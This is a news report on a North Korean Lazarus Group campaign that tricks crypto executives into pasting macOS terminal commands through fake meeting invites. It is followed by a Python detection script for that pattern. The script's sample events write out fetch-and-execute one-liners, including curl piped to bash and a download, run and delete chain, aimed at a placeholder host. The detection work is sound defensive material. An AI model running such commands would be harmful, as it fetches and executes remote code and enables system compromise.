North Korean Lazarus Group Deploys 'Mach-O Man' Malware Targeting Crypto Executives

Apr 22, 2026 12:20 UTC

A sophisticated new macOS malware campaign is targeting high-value fintech and cryptocurrency targets through advanced social engineering. The state-sponsored group has reportedly siphoned over $500 million in recent weeks.

  • Lazarus Group's 'Mach-O Man' targets macOS via 'ClickFix' social engineering
  • Recent exploits of Drift and KelpDAO resulted in $500 million in losses
  • Attackers use fake meeting invites to trick executives into running terminal commands
  • The malware is modular and designed to self-delete to avoid detection
  • Total estimated thefts by the group since 2017 reach $6.7 billion

The North Korean state-run Lazarus Group has launched a high-intensity campaign dubbed 'Mach-O Man,' designed to infiltrate corporate systems and steal credentials from fintech and cryptocurrency executives. Security experts from CertiK warn that the group is operating with institutional speed and scale, treating crypto theft as a national industry. In the past fortnight alone, the collective has reportedly stolen more than $500 million via exploits targeting Drift and KelpDAO. This activity is part of a broader pattern of state-directed financial operations, with the group's cumulative loot estimated at $6.7 billion since 2017.

The attack utilizes a delivery method known as 'ClickFix.' Attackers send urgent meeting invites via Telegram for platforms such as Zoom, Microsoft Teams, or Google Meet. Victims are directed to a fraudulent website that prompts them to copy and paste a specific command into their Mac terminal to 'fix' a simulated connection issue. By executing this command, victims grant the hackers immediate access to corporate systems, SaaS platforms, and financial resources.

The malware, developed by the Chollima division, uses native Mach-O binaries tailored for Apple environments. Because the victim manually initiates the action, traditional security controls often fail to detect the breach. Furthermore, the malware is designed to erase itself after the exploit is complete, often leaving victims unaware of the compromise until the financial damage is already done.
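As an added example (not from the article or from CertiK), the ClickFix pattern described above, a user-pasted terminal one-liner that fetches a payload, runs it and cleans up after itself, can be hunted for in endpoint process-execution telemetry. The events below are constructed, the field names (`parent`, `cmdline`) are hypothetical, and `example.invalid` is a placeholder domain.

```python
import re

# Indicators of the one-liners a ClickFix lure asks the victim to paste.
REMOTE_FETCH = re.compile(r"\b(curl|wget)\b")
PIPE_TO_INTERPRETER = re.compile(r"\|\s*(sudo\s+)?(bash|zsh|sh|python3?|osascript)\b")
ENCODED_PAYLOAD = re.compile(r"\bbase64\b.*(-d|-D|--decode)\b")
DROP_AND_EXEC = re.compile(r"chmod\s+\+x\s+([^\s'\";]+)")       # path made executable
REMOVE = re.compile(r"\brm\b(?:\s+-\S+)*\s+([^\s'\";]+)")        # path later deleted
TERMINAL_APPS = {"Terminal", "iTerm2", "Warp", "Hyper"}          # interactive parents

# Constructed sample telemetry, as an EDR or osquery-style process table might report it.
SAMPLE_EVENTS = [
    {"parent": "Terminal", "cmdline": "git status"},
    {"parent": "Terminal", "cmdline": "curl -fsSL https://example.invalid/fix.sh | bash"},
    {"parent": "Terminal", "cmdline": "bash -c 'curl -o /tmp/meetfix https://example.invalid/mf "
                                      "&& chmod +x /tmp/meetfix && /tmp/meetfix && rm -f /tmp/meetfix'"},
    {"parent": "launchd", "cmdline": "/usr/bin/curl https://example.invalid/x | sh"},
]

def classify(event):
    """Return the ClickFix-style indicators matched by a single process event."""
    cmd = event["cmdline"]
    reasons = []
    if REMOTE_FETCH.search(cmd) and PIPE_TO_INTERPRETER.search(cmd):
        reasons.append("remote_script_piped_to_interpreter")
    if ENCODED_PAYLOAD.search(cmd):
        reasons.append("encoded_payload_decoded_inline")
    # A dropped file that is made executable and removed in the same command line
    # matches the self-deleting behaviour described in the article.
    dropped = {m.group(1) for m in DROP_AND_EXEC.finditer(cmd)}
    removed = {m.group(1) for m in REMOVE.finditer(cmd)}
    if dropped & removed:
        reasons.append("dropped_binary_executed_then_deleted")
    # ClickFix relies on the victim pasting into an interactive terminal, so an
    # interactive parent raises confidence rather than being an indicator alone.
    if reasons and event.get("parent") in TERMINAL_APPS:
        reasons.append("pasted_into_interactive_terminal")
    return reasons

def triage(events):
    """Return (index, reasons) for every event matching at least one indicator."""
    hits = []
    for i, event in enumerate(events):
        reasons = classify(event)
        if reasons:
            hits.append((i, reasons))
    return hits

if __name__ == "__main__":
    for index, reasons in triage(SAMPLE_EVENTS):
        print(index, SAMPLE_EVENTS[index]["cmdline"][:60], reasons)
```

Events that fire with `pasted_into_interactive_terminal` are the ones to correlate with recent browser activity and messaging-app traffic, since the lure arrives via a meeting invite.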
